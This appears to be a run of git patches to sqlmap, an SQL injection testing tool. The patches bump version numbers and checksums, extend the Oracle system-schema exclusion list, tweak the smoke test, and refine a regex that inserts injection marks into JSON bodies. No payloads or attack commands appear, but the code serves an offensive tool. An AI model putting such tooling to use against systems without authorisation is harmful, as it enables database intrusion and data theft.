a/lib/core/settings.py +++ b/lib/core/settings.py @@ -640,7 +640,7 @@ MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024 +MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d4a2fb008fe..12ac16be154 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c6d64920b174a1fc445d6833b96a192a lib/core/settings.py +11233011a6d1ace9d5e230c89511c235 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From c378b6691cd50e9085969c9b147057e45707465d Mon Sep 17 00:00:00 2001 From: Arjun V Date: Mon, 19 Mar 2018 05:21:00 +0530 Subject: [PATCH 083/428] Adding sample schemas shipped with Oracle DB (#2992) * Adding sample schemas shipped with Oracle DB Added sample schemas that are included with the Oracle Guides. They are unbelievably common in live systems from personal experience. https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#TDPSG20303 * Adding as an oracle system database for exclusion `APPQOSSYS` schema is used by Oracle Database QoS Management https://docs.oracle.com/cd/E11882_01/server.112/e24611/install_config.htm --- lib/core/settings.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cbb779cd7bb..bfd2b431540 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -221,11 +221,14 @@ PLATFORM = os.name PYVERSION = sys.version.split()[0] +# DBMS sample databases +ORACLE_SAMPLE_DBS = ("BI", "HR", "OE", "OC", "PM", "IX", "SH", "SCOTT") # https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#BABHFGJF + # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ORACLE_SAMPLE_DBS + ("ANONYMOUS", "APEX_PUBLIC_USER", "APEX_030200", "APPQOSSYS", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") From e63b97afd6dbff7476010ba7546c757b1a0fd2bb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:53:16 +0100 Subject: [PATCH 084/428] Refactoring #2992 --- lib/core/settings.py | 7 ++----- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bfd2b431540..720e2b42d6a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.35" +VERSION = "1.2.3.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -221,14 +221,11 @@ PLATFORM = os.name PYVERSION = sys.version.split()[0] -# DBMS sample databases -ORACLE_SAMPLE_DBS = ("BI", "HR", "OE", "OC", "PM", "IX", "SH", "SCOTT") # https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#BABHFGJF - # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ORACLE_SAMPLE_DBS + ("ANONYMOUS", "APEX_PUBLIC_USER", "APEX_030200", "APPQOSSYS", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL') SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 12ac16be154..3ee084f16d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -11233011a6d1ace9d5e230c89511c235 lib/core/settings.py +8e6e1cf126bfcd8fa6f7deabf06e81c3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 305b2aa9b519f3586daea0b6bf5be7e662cd7269 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 01:02:28 +0100 Subject: [PATCH 085/428] Minor update for smoke test --- lib/core/settings.py | 2 +- lib/core/testing.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 720e2b42d6a..2d969bb973f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.36" +VERSION = "1.2.3.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/testing.py b/lib/core/testing.py index ec53aa1de93..0330a83959b 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -17,6 +17,7 @@ from extra.beep.beep import beep from lib.controller.controller import start +from lib.core.common import checkIntegrity from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getUnicode @@ -87,6 +88,8 @@ def smokeTest(): status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + retVal &= checkIntegrity() + clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee084f16d9..9519599be6a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,11 +46,11 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e6e1cf126bfcd8fa6f7deabf06e81c3 lib/core/settings.py +ad8c61259bd3a95c25c4b02d48bd3502 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py -72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py +a76f81b3e9e620b3e1d4bdea9160eef8 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py From 0ddc7bae66c7acfc924285388d91bd6f6a55b6a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Mar 2018 10:31:31 +0100 Subject: [PATCH 086/428] Fixes #2997 --- lib/core/common.py | 7 +++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 3ac16fa1772..1762e5e8c59 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3928,6 +3928,9 @@ def isAdminFromPrivileges(privileges): def findPageForms(content, url, raise_=False, addToTargets=False): """ Parses given page content for possible forms + + >>> findPageForms('
    ', '') + set([(u'/input.php', 'POST', u'id=1', None, None)]) """ class _(StringIO): @@ -3950,8 +3953,6 @@ def geturl(self): try: forms = ParseResponse(response, backwards_compat=False) - except (UnicodeError, ValueError): - pass except ParseError: if re.search(r"(?i)...) -VERSION = "1.2.3.37" +VERSION = "1.2.3.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9519599be6a..da13f37c1d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -10654e525e0740a8a0df9b1baab455d2 lib/core/common.py +bb77843791f2ca02142fee8743213671 lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ad8c61259bd3a95c25c4b02d48bd3502 lib/core/settings.py +86aca5c620149829e45eec160205b5dc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 880d709bfd28ad550b8067a19b1452aba6ec3a15 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Mar 2018 10:32:47 +0100 Subject: [PATCH 087/428] Removing checkIntegrity() from smokeTest() (primarly used before commiting) --- lib/core/settings.py | 2 +- lib/core/testing.py | 3 --- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c1f6914123e..c5136ca6f12 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.38" +VERSION = "1.2.3.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/testing.py b/lib/core/testing.py index 0330a83959b..ec53aa1de93 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -17,7 +17,6 @@ from extra.beep.beep import beep from lib.controller.controller import start -from lib.core.common import checkIntegrity from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getUnicode @@ -88,8 +87,6 @@ def smokeTest(): status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) - retVal &= checkIntegrity() - clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index da13f37c1d9..30994d2365d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,11 +46,11 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -86aca5c620149829e45eec160205b5dc lib/core/settings.py +0e552878afbf998e3eaa913dee384aa9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py -a76f81b3e9e620b3e1d4bdea9160eef8 lib/core/testing.py +72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py From 4fc7fc6447a3e5846e6cc6f92e34818cb657827b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Mar 2018 11:32:31 +0100 Subject: [PATCH 088/428] Patch for an Issue #2943 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5136ca6f12..8d6eb2c5952 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.39" +VERSION = "1.2.3.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index ab1aa2f6b9c..98d0de3b9da 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -142,7 +142,7 @@ def process(match, repl): if not (kb.processUserMarks and kb.customInjectionMark in conf.data): conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*".+?)"(?%s"' % kb.customInjectionMark), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30994d2365d..2e52146ef42 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,10 +46,10 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0e552878afbf998e3eaa913dee384aa9 lib/core/settings.py +36c768f8c13856d626fc96a08e9e6098 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py +a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 7d5a0ed2dc18dca6900bd5dabbc4fbd04ba48cc5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 21 Mar 2018 14:22:59 +0100 Subject: [PATCH 089/428] Use false-positive checks in dummy mode --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index b8e54cfe946..498a70009f3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -686,7 +686,7 @@ def genCmpPayload(): kb.previousMethod = method - if conf.dummy or conf.offline: + if conf.offline: injectable = False # If the injection test was successful feed the injection diff --git a/lib/core/settings.py b/lib/core/settings.py index 8d6eb2c5952..a2be2c0816f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.40" +VERSION = "1.2.3.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2e52146ef42..af24e3634ca 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -e15cd43d7bd71d04990494d13897c490 lib/controller/checks.py +8418f90f8d898b58fe25ec9153977849 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -36c768f8c13856d626fc96a08e9e6098 lib/core/settings.py +4a6fafc241853910a0dbf4ce74f98da9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From f287ff376778d98ebc7d0d36f090756a84add153 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 21 Mar 2018 14:29:54 +0100 Subject: [PATCH 090/428] Trivial comment update --- lib/controller/checks.py | 4 ++-- lib/core/common.py | 2 +- lib/core/convert.py | 2 +- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- lib/utils/search.py | 2 +- txt/checksum.md5 | 12 ++++++------ 7 files changed, 13 insertions(+), 13 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 498a70009f3..06a395bcaee 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1569,8 +1569,8 @@ def checkInternet(): content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0] return CHECK_INTERNET_VALUE in (content or "") -def setVerbosity(): # Cross-linked function +def setVerbosity(): # Cross-referenced function raise NotImplementedError -def setWafFunctions(): # Cross-linked function +def setWafFunctions(): # Cross-referenced function raise NotImplementedError diff --git a/lib/core/common.py b/lib/core/common.py index 1762e5e8c59..a4898e25508 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2662,7 +2662,7 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None): dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) -def getPageTemplate(payload, place): # Cross-linked function +def getPageTemplate(payload, place): # Cross-referenced function raise NotImplementedError @cachedmethod diff --git a/lib/core/convert.py b/lib/core/convert.py index 7240655ef1a..fcd0d277c71 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -174,7 +174,7 @@ def htmlunescape(value): pass return retVal -def singleTimeWarnMessage(message): # Cross-linked function +def singleTimeWarnMessage(message): # Cross-referenced function sys.stdout.write(message) sys.stdout.write("\n") sys.stdout.flush() diff --git a/lib/core/settings.py b/lib/core/settings.py index a2be2c0816f..20ae2b99e32 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.41" +VERSION = "1.2.3.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 4f2defc2856..df045c3cf4d 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1279,5 +1279,5 @@ def _randomizeParameter(paramString, randomParameter): else: return comparison(page, headers, code, getRatioValue, pageLength) -def setHTTPHandlers(): # Cross-linked function +def setHTTPHandlers(): # Cross-referenced function raise NotImplementedError diff --git a/lib/utils/search.py b/lib/utils/search.py index c660d4aee47..0d6e770b702 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -187,5 +187,5 @@ def search(dork): finally: kb.redirectChoice = popValue() -def setHTTPHandlers(): # Cross-linked function +def setHTTPHandlers(): # Cross-referenced function raise NotImplementedError diff --git a/txt/checksum.md5 b/txt/checksum.md5 index af24e3634ca..7495cd4e1a5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,14 +21,14 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -8418f90f8d898b58fe25ec9153977849 lib/controller/checks.py +6f0db0b505eec576e28d97cced3ad338 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -bb77843791f2ca02142fee8743213671 lib/core/common.py -1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py +58312f5c2f252145ec4aed01bc7952a0 lib/core/common.py +0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a6fafc241853910a0dbf4ce74f98da9 lib/core/settings.py +30b479368e2a9d72b055753ef3a5a740 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 